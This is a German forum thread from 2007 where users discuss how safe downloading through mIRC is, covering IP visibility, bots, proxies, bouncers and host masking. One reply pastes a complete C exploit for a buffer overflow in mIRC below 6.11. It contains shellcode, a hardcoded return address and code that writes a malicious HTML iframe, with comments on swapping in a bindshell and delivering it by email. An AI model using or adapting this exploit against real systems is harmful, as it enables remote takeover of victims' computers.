Wie sicher ist Mirc?

Dieses Thema im Forum "Filesharing" wurde erstellt von cradle, 7. Januar 2007 .

Schlagworte:
  1. 7. Januar 2007
    moin, ich würd mal gerne wissen wollen, wie sicher man ist, wenn man mit mirc runterlädt.
    hab da n paar sachen gefunden die ich sonst nirgends finde.
    hab irgendwo mal gehört, dass dort jeder die ip von mir sehen kann ?!

    ich hoffe dieses thema gabs noch nicht..
    hoffe ihr wisst mehr als ich^^

    danke im vorraus
     
  2. 7. Januar 2007
    AW: Wie sicher ist Mirc?

    also ich hab ma so gehört, das es halt über bots läuft die aufen server laufen!
    also is normal sicher wie hier leechen auch!
     
  3. 7. Januar 2007
    AW: Wie sicher ist Mirc?

    ja das mit den bots hab ich auch gehört... aber wie siehts denn mit den servern aus über die die bots laufen?
     
  4. 7. Januar 2007
    AW: Wie sicher ist Mirc?

    die stehen sehr oft in Korea!
    Musst halt sniffen.
    Aber ob das gemietete roots oder hacked server sind, weiß ich nicht!
     
  5. 7. Januar 2007
    AW: Wie sicher ist Mirc?

    Hi,

    du suchst dir einfach den Bot von dem du laden möchtest. Dann machst du nen whois bei dem Bot. Und die IP oder die mask die da rauskommt musst du dann bei nem Whois im inet nachschlagen.

    Es gibt auch mIRC Versionen die das automatisch machen. Oder die dir jedenfalls gleich die IP anzeigen und nicht erst die Mask.

    MfG
     
  6. 7. Januar 2007
    AW: Wie sicher ist Mirc?

    Also mIRC wird oft von hackern benutzt,weil das ziemlich einfach ist.

    Wenn ich mich einlogge und paar minuten drin bleibe werde ich schon gescannt. PortScann über Proxy.

    Es gibt auch ziemlich viele IRC Trojaner.Die installieren sich selber und du merkst es nicht.

    Die Ip von dir kannst du ausmachen mit einem script.

    Laden, ja. Wenn du ein gutes IRC script hast was dich vor trojanern und sonstigen mist schützt,dann kannst du laden.

    mfg Kekus
     
  7. 7. Januar 2007
    AW: Wie sicher ist Mirc?

    Hmm...also das man die IP mit nem Script verbergen kann is mir neu...?

    Wie soll das gehen? Ich wei0 nur das man beispielsweise im Quakenet die IP mit nem Command vom Server Netz aus verbergen kann. Oder das wenn man über nen BNC reingeht nur die IP des BNC'S dasteht.

    Aber was soll das fürn Script sein?@Kekus

    gr33tz
     
  8. 7. Januar 2007
    AW: Wie sicher ist Mirc?

    hoi,

    einfach nen socks5 einbinden.. dann sieht man die ip schonmal nicht direkt.. wenn du dann keine daten austauscht, dann sieht man sie auch nicht....

    zur sicherheit noch was:

    sollte an sich alles sagen..^^

    Code:
    /** remote mirc < 6.11 exploit by blasty
     **
     ** TESTED ON: Windows XP (No SP, Ducth) Build: 2600.xpclient.010817-1148
     **
     ** A few days ago, I saw a mIRC advisory on packetstorm [1] and was surprised
     ** nobody had written an exploit yet. So I decided to start writing one.
     ** Since this was my first time coding a exploit for windows, it took some
     ** research before I got the hang of it. (Ollydbg is much more confusing then GDB btw :P)
     **
     ** This exploits (ab)uses the bug in irc:// URI handling. It contains a buffer-
     ** overflow, and when more then 998 bytes are given EIP will be overwritten.
     ** 
     ** At first I was thinking of a simple solution to get this exploitable. Since
     ** giving an URI with > 998 chars to someone on IRC is simply NOT done :)
     ** Then I remember the iframe-irc:// flaw found by uuuppzz [2]
     **
     ** This exploit will write an malicious HTML file containing an iframe executing the
     ** irc:// address. So you can give this to anyone on IRC for example ;)
     ** The shellcode included does only execute cmd.exe, because I don't want to be this
     ** a scriptkiddy util. But, replacing the shellcode with your own is also possible.
     ** An 400 bytes shellcode (bindshell etc.) easily fits in the buffer, but it may require
     ** some tweaking.
     ** After exiting the cmd.exe mIRC will crash, so shellcode its not 100% clean, but who carez :)
     **
     ** Oh yeah, I almost forgot.. this exploit also works even if mIRC isn't started.
     ** mIRC will start automatically when an irc:// is executed, so you can also send somebody
     ** and HTML email containing the evil HTML code. (only for poor clients like Outlook Express :P)
     **
     **/
    
    #include <stdio.h>
    
    
    /* Stupid cmd.exe exec shellcode. hey! I r !evil ;) */
    unsigned char shellcode[] =
     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
     "\x8b\xec\x55\x8b\xec\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e\x8d\x45\xf8\x50\xb8"
     "\x44\x80\xbf\x77" // 0x78bf8044 <- adress of system()
     "\xff\xd0"; // call system()
     
    
    char jmpback[] =
     "\xE9\xCF\xFB\xFF\xFF"; // my leet negative JMP shellcode :)
    
    char buffer[1100], fstring[1300]; // heh, need to clean this up
    
    int main(int argc, char *argv[]) {
     FILE *evil;
    
     fprintf(stdout, "---------------------------------------------\n"
     "mIRC < 6.11 remote exploit by blasty@geekz.nl\n"
     "Exploit downloaded on www.k-otik.com\n"
     "---------------------------------------------\n\n");
    
     // NOPslides are cool
     memset(buffer, 0x90, sizeof(buffer) - 1);
    
     // place shellcode in buffer
     memcpy(buffer + 20, shellcode, strlen(shellcode));
    
     // took this one from ntdll.dll (jmp esp)
     *(long *)&buffer[994] = 0x77F4801C;
    
     // place jmpback shellcode in buffer
     memcpy(buffer + 20 + strlen(shellcode) + 1010, jmpback, strlen(jmpback));
    
     printf("[+] Evil buffer constructed\n");
    
    
     // open HTML file for writing
     if((evil = fopen("index.html", "a+")) != NULL) {
    
     // construct evil string :)
     sprintf(fstring, "<iframe src=\"irc://%s\"></iframe>", buffer);
    
     // write string to file
     fputs(fstring, evil);
    
     // close file
     fclose(evil);
    
     printf("[+] Evil HTML file written!\n");
     return(0);
     } else {
     // uh oh.. :/
     fprintf(stderr, "ERROR: Could not open index.html for writing!\n");
     exit(1);
     }
    }
    
    
    // milw0rm.com [2003-10-21]
     
  9. 7. Januar 2007
    AW: Wie sicher ist Mirc?


    super^^
    dann wäre man ja schon geloggt und dann bringts einem im nachhinein auch nichts mehr, wenn man abbricht.
    Wenn man den Bot whoist bekommt man eigentlich auch nur den Ort wo der IRC Server steht..oder?
    Wenn du über mirc nen proxy einbindest dürfts schon etwas sicherer sein. ich nehm ma an deine IP würde später nur auf dem server vom bot auslesbar sein und eben auf dem von dem du lädst.
    kenn mich aber auch nicht so mit dem mirc zeugs aus...
     
  10. 7. Januar 2007
    AW: Wie sicher ist Mirc?

    Hmm... Also MIRC ist eigentlich nur nen Client für ein IRC-Netzwerk. Ihr meint wahrschinlich mti "laden" via irc das sogennate DCC-System...

    Wenn man via dcc lädt ist das ähnlich dem Filesharing-System. Man verbindet sich selbst mit einem anderen PC, bzw mit mehreren und lädt einzene Teile runter. Der Server ist im Prinzip nur der Verteiler. Er sagt wohin mein Pc connecten soll. Genauso wie bei Filesharing ist es also für jeden sichtbar wie deine IP ist. Ein Proxy bringt auch nur bedingt sicherheit. Man bräuchte schon einen Proxy der garnix loggt haben... Die sind numal sehr selten. Ein BNC hilft dabei soweit ich weiß garnicht! Er funktionert nur für das Chatten. nicht aber beim Datentransfer!

    Ich hoffe das hilft weiter.

    Gruß D
     
  11. 7. Januar 2007
    AW: Wie sicher ist Mirc?

    erstmal danke an alle
    hab das mal mit whois da getestet und bei nem bot stand nur

    is system@8F2ED089.E55E3A3D.A78D951E.IP * NAME
     
  12. 13. Januar 2007
    AW: Wie sicher ist Mirc?

    so weit ich weiß dürfte es im irc sehr sicher sein solange du nen bouncer (bnc) hast. die dinger funktionieren im weiten sinne so ähnlich wie n proxy, du connectest zum bnc und der ins irc und ist dann auch immer dort wie ne art anrufbeantwortender platzhalter
    somit müssts sehr sicher sein. wobei ich mir aber net ganz sicher bin.
    ihr dürft mich gerne korrigieren (nicht die rechtschreibung!)

    mfg
    DrBanana
     
  13. 13. Januar 2007
    AW: Wie sicher ist Mirc?

    man brauch nicht umbedingt einen Bouncer, auf den meisten IRC Netzwerken kann man sich Registrieren/Authen und den "mode x" setzen (/mode $me +x) dadurch ist eure IP-Adresse nicht mehr sichbar sondern nur noch der (v)host vom Netzwerk.
     
  14. 13. Januar 2007
    AW: Wie sicher ist Mirc?

    Im Computer Bild stand drin, dass IRC äusserst sicher ist, besonders wenn man von Bots läd.
    Wenn man untereinander tauscht, hieße es, kann man das noch abhören, doch mit dem Datenabruf durch Bots sei das unmöglich.

    Lediglich das Auffliegen des IRC Servers könne ihnen die benötigten IP-Adressen liefern.

    Hab das so gelesen

    mfg
     
  15. 14. Januar 2007
    AW: Wie sicher ist Mirc?

    Du meisnt nicht zufällig den Portscan, den das IRC Netzwerk aus Sicherheitsgründen jedesmal wenn du connectest auf deiner IP ausführt, oder?
    das ist nämlich ganz normal und überhaupt kein Grund zur Beunruhigung
     
  16. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.